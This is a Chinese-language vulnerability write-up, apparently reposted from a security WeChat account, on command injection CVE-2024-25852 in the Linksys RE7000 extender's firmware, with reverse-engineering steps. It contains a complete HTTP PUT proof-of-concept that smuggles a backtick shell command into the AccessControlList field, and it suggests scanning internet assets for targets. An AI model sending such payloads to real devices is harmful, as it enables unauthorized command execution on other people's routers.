1.漏洞介绍
产品描述:
Linksys是贝尔金旗下一个销售家用与小型业务用网络产品的部门,主要经营宽带与无线路由器。RE7000是Linksys推出的一款新型双频AC1900无线扩展器,具有无缝漫游功能。
固件下载:
https://downloads.linksys.com/support/assets/firmware/RE7000v2_PROD_FW_v2.0.15_211230_1012.bin
漏洞描述:
CVE-2024-25852
2.漏洞分析
漏洞触发功能点Access Control:
使用binwalk工具提取固件文件系统:
binwalk -Me --run-as=root RE7000v2_PROD_FW_v2.0.15_211230_1012.bin使用grep工具快速查找漏洞参数:
grep -rl AccessControlList | grep .so
使用IDA逆向工具打开libcbtjson.so文件,按Alt+t搜索“AccessControlList”关键字:
进入“.rodata:0003B60C”只读数据地址,看到各类参数名称,分别用于控制不同的功能:
进入“set_accessControlList”函数,通过“set_value_nvram”函数获取传入参数a1和a2,通过“fprintf”函数将a1和a2变量格式化输出,最后将a2代入“cbt_system”函数执行系统命令。
3.漏洞复现
通过qemu固件模拟或搜索网络资产目标:
漏洞利用POC:
PUT /goform/AccessControl HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 17 Sep 2020 11:24:58 GMTIf-None-Match: "14600429"Content-Length: 81{"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/1.txt`"}
V2.0.15版本漏洞复现:
BurpSuite工具发送POC并执行ps命令输出到1.txt文件:
访问1.txt文件可以看到攻击成功了。
4.挖掘成果
漏洞报告提交后获取CVE编号和CNVD漏洞证书:
现存多张CNVD/CNNVD/CVE证书,需要的小伙伴可以添加下面微信咨询:
原文始发于微信公众号(ZackSecurity):【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论